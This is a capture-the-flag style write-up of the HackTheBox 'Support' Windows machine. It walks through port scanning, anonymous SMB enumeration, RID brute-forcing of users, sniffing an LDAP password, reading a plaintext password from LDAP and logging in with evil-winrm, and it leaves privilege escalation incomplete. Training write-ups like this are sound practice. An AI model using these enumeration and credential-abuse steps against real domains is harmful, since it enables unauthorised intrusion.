Support - wook413

#hackthebox #windows #easy # Information Gathering As always, I opened the box with scanning all TCP ports. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -Pn -n --open --min-rate 3000 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 16:12 UTC Nmap scan report for 10.10.11.174 Host is up (0.048s latency). Not shown: 65516 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5985/tcp open wsman 9389/tcp open adws 49664/tcp open unknown 49668/tcp open unknown 49674/tcp open unknown 49676/tcp open unknown 49702/tcp open unknown 49740/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 43.87 seconds ``` Then I run another TCP scan against the discovered ports. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sCV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49674,49676,49702,49740 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 16:22 UTC Nmap scan report for 10.10.11.174 Host is up (0.047s latency). PORT STATE SERVICE VERSION 53/tcp open domain (generic dns response: SERVFAIL) | fingerprint-strings: | DNS-SD-TCP: | _services | _dns-sd | _udp |_ local 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-24 16:23:00Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing 49664/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49676/tcp open msrpc Microsoft Windows RPC 49702/tcp open msrpc Microsoft Windows RPC 49740/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.95%I=7%D=8/24%Time=68AB3C72%P=x86_64-pc-linux-gnu%r(DNS- SF:SD-TCP,30,"\0\.\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04 SF:_udp\x05local\0\0\x0c\0\x01"); Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2025-08-24T16:23:49 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 96.47 seconds ``` Lastly, a UDP scan against top 10 ports ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sU --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 16:22 UTC Nmap scan report for 10.10.11.174 Host is up (0.050s latency). PORT STATE SERVICE 53/udp open domain 67/udp open|filtered dhcps 123/udp open ntp 135/udp open|filtered msrpc 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 161/udp open|filtered snmp 445/udp open|filtered microsoft-ds 631/udp open|filtered ipp 1434/udp open|filtered ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 1.73 seconds ``` --- # Enumeration Before anything, I mapped the target IP address with the domain in the `/etc/hosts` file. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ echo '10.10.11.174 support.htb' | sudo tee -a /etc/hosts [sudo] password for kali: 10.10.11.174 support.htb ``` ##### SMB - TCP 139 445 For Windows boxes, I like to start my enumeration with `SMB` if they are available. `smbclient` reveals 6 shares including `support-tools` that's not a default share. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ smbclient -N -L //$IP Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share support-tools Disk support staff tools SYSVOL Disk Logon server share Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.11.174 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ``` As the name suggested, the share contained support tools like `7zip`, `notepad++`, `putty` and more. However, there's a file that's not publicly available: `UserInfo.exe.zip` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ smbclient -N //$IP/support-tools Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Jul 20 17:01:06 2022 .. D 0 Sat May 28 11:18:25 2022 7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 11:19:19 2022 npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 11:19:55 2022 putty.exe A 1273576 Sat May 28 11:20:06 2022 SysinternalsSuite.zip A 48102161 Sat May 28 11:19:31 2022 UserInfo.exe.zip A 277499 Wed Jul 20 17:01:07 2022 windirstat1_1_2_setup.exe A 79171 Sat May 28 11:20:17 2022 WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 11:19:43 2022 4026367 blocks of size 4096. 970452 blocks available ``` I downloaded the file and looked at the contents inside with `unzip -l` option before extracting it. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ unzip -l UserInfo.exe.zip Archive: UserInfo.exe.zip Length Date Time Name --------- ---------- ----- ---- 12288 2022-05-27 17:51 UserInfo.exe 99840 2022-03-01 18:18 CommandLineParser.dll 22144 2021-10-22 23:42 Microsoft.Bcl.AsyncInterfaces.dll 47216 2021-10-22 23:48 Microsoft.Extensions.DependencyInjection.Abstractions.dll 84608 2021-10-22 23:48 Microsoft.Extensions.DependencyInjection.dll 64112 2021-10-22 23:51 Microsoft.Extensions.Logging.Abstractions.dll 20856 2020-02-19 10:05 System.Buffers.dll 141184 2020-02-19 10:05 System.Memory.dll 115856 2018-05-15 13:29 System.Numerics.Vectors.dll 18024 2021-10-22 23:40 System.Runtime.CompilerServices.Unsafe.dll 25984 2020-02-19 10:05 System.Threading.Tasks.Extensions.dll 563 2022-05-27 16:59 UserInfo.exe.config --------- ------- 652675 12 files ``` First, I just extracted `UserInfo.exe` and `UserInfo.exe.config` files because those are two files that I'm most interested in. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ unzip UserInfo.exe.zip UserInfo.exe UserInfo.exe.config Archive: UserInfo.exe.zip inflating: UserInfo.exe inflating: UserInfo.exe.config ``` `UserInfo.exe.config` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ cat UserInfo.exe.config <?xml version="1.0" encoding="utf-8"?> <configuration> <startup> <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8" /> </startup> <runtime> <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1"> <dependentAssembly> <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" /> <bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" /> </dependentAssembly> </assemblyBinding> </runtime> </configuration> ``` I was able to enumerate users with `nxc` plus `--rid-brute` option. ![[Pasted image 20250824114936.png]] Turn the output into a `users.txt` wordlist. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ cat users | cut -d '\' -f 2 | cut -d ' ' -f 1 > users.txt ┌──(kali㉿kali)-[~/Desktop] └─$ cat users.txt Administrator Guest krbtgt DC$ ldap support smith.rosario hernandez.stanley wilson.shelby anderson.damian thomas.raphael levine.leopoldo raven.clifton bardot.mary cromwell.gerard monroe.david west.laura langley.lucy daughtler.mabel stoll.rachelle ford.victoria MANAGEMENT$ ``` `UserInfo.exe` appears to contain information about `LDAP` but It's hard to inspect `.exe` file in Linux. ![[Pasted image 20250824122432.png]] I downloaded `mono` which enables you to run Windows binary in Linux ```bash ┌──(kali㉿kali)-[~/Desktop/UserInfo] └─$ mono --version Mono JIT compiler version 6.12.0.199 (tarball Thu Apr 3 15:13:01 UTC 2025) Copyright (C) 2002-2014 Novell, Inc, Xamarin Inc and Contributors. www.mono-project.com TLS: SIGSEGV: altstack Notifications: epoll Architecture: amd64 Disabled: none Misc: softdebug Interpreter: yes LLVM: supported, not enabled. Suspend: hybrid GC: sgen (concurrent by default) ``` ```bash ┌──(kali㉿kali)-[~/Desktop/UserInfo] └─$ mono UserInfo.exe find [-] At least one of -first or -last is required. ┌──(kali㉿kali)-[~/Desktop/UserInfo] └─$ mono UserInfo.exe find -first wook [-] Exception: No Such Object ┌──(kali㉿kali)-[~/Desktop/UserInfo] └─$ mono UserInfo.exe find -first wook -v [*] LDAP query to use: (givenName=wook) [-] Exception: No Such Object ``` `Wireshark` captured traffic to LDAP protocol and its packet contains authentication. User is `support\ldap` and password appears to be `nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz` ![[Pasted image 20250824142421.png]] I tested this set of credentials with `nxc` ![[Pasted image 20250824142729.png]] ##### GetNPUsers.py - Impacket I tried to see if `AS-REP roasting` is possible with `GetNPUsers.py` from `Impacket` but it appears none of them has `UF_DONT_REQUIRE_PREAUTH` set. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ impacket-GetNPUsers support.htb/ -dc-ip $IP -usersfile users.txt -format hashcat -outputfile output.txt -no-pass Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] User DC$ doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User ldap doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User support doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User smith.rosario doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User hernandez.stanley doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User wilson.shelby doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User anderson.damian doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User thomas.raphael doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User levine.leopoldo doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User raven.clifton doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User bardot.mary doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User cromwell.gerard doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User monroe.david doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User west.laura doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User langley.lucy doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User daughtler.mabel doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User stoll.rachelle doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User ford.victoria doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User MANAGEMENT$ doesn't have UF_DONT_REQUIRE_PREAUTH set ``` Back to `LDAP`, I used `ldapsearch` `ldapsearch -H ldap://$IP -D '[email protected]' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'DC=support,DC=htb'` This outputted a lot of information so I saved it to a file `ldap.out` Under `support, Users, support.htb`, `info` field has some plain text that appears to be a password. `support:Ironside47pleasure40Watchful` ![[Pasted image 20250824145311.png]] `nxc` confirms the credentials set is actually valid. When I added a `z` at the end of the valid password, it returned `LOGON_FAILURE`. ![[Pasted image 20250824145632.png]] Port 5985 is open on the target, let's see if we can `winRM` into the target machine with `support` user. ![[Pasted image 20250824145915.png]] Successfully logged in via `evil-winrm` as `support`. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ evil-winrm -i $IP -u support -p 'Ironside47pleasure40Watchful' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\support\Documents> whoami support\support ``` Found `user.txt` ```powershell *Evil-WinRM* PS C:\Users\support> cd Desktop *Evil-WinRM* PS C:\Users\support\Desktop> ls Directory: C:\Users\support\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 8/24/2025 9:08 AM 34 user.txt *Evil-WinRM* PS C:\Users\support\Desktop> type user.txt bb5... ``` # Privilege Escalation (INCOMPLETE) I got stuck on the PrivEsc part and ended up referring to `0xdf`'s writeup. If I remember correctly, 0xdf is also the creator of this machine. Honestly, I think this machine is way beyond my current skill level (How is this an easy-rated machine?) and to be fair, I don't think such a complex privilege escalation would appear on the OSCP exam. So I'm going to leave this writeup incomplete at this point, and I'll come back to it later if I get the chance.